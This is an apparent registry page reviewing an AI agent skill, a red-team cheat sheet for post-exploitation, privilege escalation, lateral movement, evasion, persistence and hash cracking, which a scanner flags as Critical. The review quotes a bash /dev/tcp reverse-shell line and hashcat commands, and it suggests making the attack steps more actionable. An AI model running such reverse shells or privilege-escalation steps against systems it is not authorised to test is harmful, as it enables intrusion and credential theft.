CtrlK
BlogDocsLog inGet started
Tessl Logo

post-exploitation

后渗透/提权+凭据破解+密码学:反弹shell,Linux/Windows提权,横向,隧道,免杀,C2持久化,hashcat/Padding Oracle/hash长度扩展。Use when post-exploitation, privilege escalation, lateral movement, or cracking crypto.

67

Quality

82%

Does it follow best practices?

Run evals on this skill

Adds up to 20 points to the overall score

View guide

SecuritybySnyk

Critical

Do not install without reviewing

SKILL.md
Quality
Evals
Security

Quality

Content

76%Weight 40%Scale 1-5

Reviews the quality of instructions and guidance provided to agents. Good implementation is clear, handles edge cases, and produces reliable results.

An exceptionally token-efficient, tool-dense cheat sheet that assumes Claude's competence and gives runnable commands for many operations, including one well-validated credential-confirmation workflow. Its weaknesses are uneven actionability (tool names without syntax), mostly unsequenced checklist-style sections, and a single monolithic code block that suppresses navigability.

Suggestions

Add explicit sequencing to the privesc/tunneling/persistence sections (e.g. an enumeration-first → confirm-misconfig → exploit → validate order), mirroring the validate-then-confirm pattern already present in the RDP credential section.

For tools that are currently name-only (PrintSpoofer/GodPotato, chisel, ligolo-ng, crackmapexec, hashpump), include a minimal invocation example so each entry is copy-paste actionable like the hashcat and reverse-shell lines already are.

Break the single code block into per-section headers (反弹shell / 提权 / 横向 / 隧道 / 免杀 / C2 / 持久化 / 破解) or split deeper checklists into reference files, and convert cross-skill mentions like 'pentest-output-standards' and 'web-attack-methods' into clearly signaled links.

DimensionReasoningScore

Conciseness

The body is a lean cheat sheet where every token is a command, tool name, or technique — e.g. 'sudo -l;SUID(GTFOBins);getcap;cron;可写文件' — with zero padding and no explanation of concepts Claude already knows. This matches the 'every token earns its place' anchor exactly.

5 / 5

Actionability

Many lines are executable as written ('bash -i >& /dev/tcp/IP/4444 0>&1', the pty.spawn one-liner, 'hashcat -m <mode> hash wordlist -r rules/best64.rule' with concrete mode numbers like 1800/3200/13100), but a substantial share are tool name-drops without invocation syntax ('PrintSpoofer/GodPotato', 'chisel', 'ligolo-ng', 'crackmapexec', 'hashpump'). Mostly executable with gaps, so 4 rather than 5.

4 / 5

Workflow Clarity

Sequencing and validation appear only in patches: the hash-cracking section has an ordered strategy ('先字典(rockyou)+规则→掩码?d?d?d?d→组合攻击 | john 兜底') and the RDP-credential section has a genuine validate-then-confirm loop (baseline wrong-password rdp_check → compare 'Connection reset' vs 'Access Denied' → confirm → spray other services). However the privesc, tunneling, evasion, and persistence sections are unsequenced parallel checklists with no checkpoints, which fits the 3 anchor ('sequence present but checkpoints missing or implicit') better than the 4 anchor.

3 / 5

Progressive Disclosure

The body is under 50 lines with no bundle files, and is organized into two === sections under a ## header — good structure for a cheat sheet of this size. It falls short of 5 because everything is packed into a single monolithic code block with no navigable sections, and cross-skill references ('pentest-output-standards' 台账, 'web-attack-methods') are inline name-drops rather than clearly signaled links.

4 / 5

Total

16

/

20

Passed

Description

88%Weight 40%Scale 1-5

Based on the skill's description, can an agent find and select it at the right time? Clear, specific descriptions lead to better discovery.

A strong description: dense with concrete capabilities in both Chinese and English, third-person, with an explicit 'Use when...' trigger clause. Its main weakness is that the multi-domain breadth dilutes distinctiveness and the trigger list omits several natural phrasings users would say. It is nowhere near the vague 'helps with documents' failure mode.

DimensionReasoningScore

Specificity

The description enumerates multiple concrete capabilities — '反弹shell, Linux/Windows提权, 横向, 隧道, 免杀, C2持久化, hashcat/Padding Oracle/hash长度扩展' — giving comprehensive coverage of the post-exploitation, privesc, and crypto-attack domain with no vague filler. Nothing is left at the abstract 'helps with pentesting' level, so it exceeds the 'minor gaps' anchor at 4.

5 / 5

Completeness

Both halves are explicit: the 'what' is a full capability inventory before the colon, and the 'when' is a concrete 'Use when...' clause naming four trigger scenarios. This matches the top anchor exactly rather than the 4 anchor's 'when could be more explicit'.

5 / 5

Trigger Term Quality

'Use when post-exploitation, privilege escalation, lateral movement, or cracking crypto' plus the Chinese equivalents (提权, 横向, 凭据破解) gives good natural keyword coverage. It falls short of the 5 anchor because common variations users would actually say — 'password/hash cracking', 'persistence', 'tunneling', 'reverse shell' — are absent from the trigger clause.

4 / 5

Distinctiveness Conflict Risk

Niche markers like 'Padding Oracle/hash长度扩展' and '免杀/C2持久化' anchor it to a distinct red-team skill, but it deliberately spans three broad domains (post-exploitation, credential cracking, cryptography attacks) that could each be a separate skill, creating minor overlap risk with adjacent skills such as the referenced 'web-attack-methods'. Mostly distinct rather than a clear single niche, so 4 rather than 5.

4 / 5

Total

18

/

20

Passed

Validation

87%

Checks the skill against the spec for correct structure and formatting. All validation checks must pass before discovery and implementation can be scored.

Validation — 14 / 16 Passed

Validation for skill structure

CriteriaDescriptionResult

metadata_version

'metadata.version' is missing

Warning

metadata_field

'metadata' should map string keys to string values

Warning

Total

14

/

16

Passed

Repository
AIPentest/CyberStrikeAI
Reviewed

Table of Contents

Is this your skill?

If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.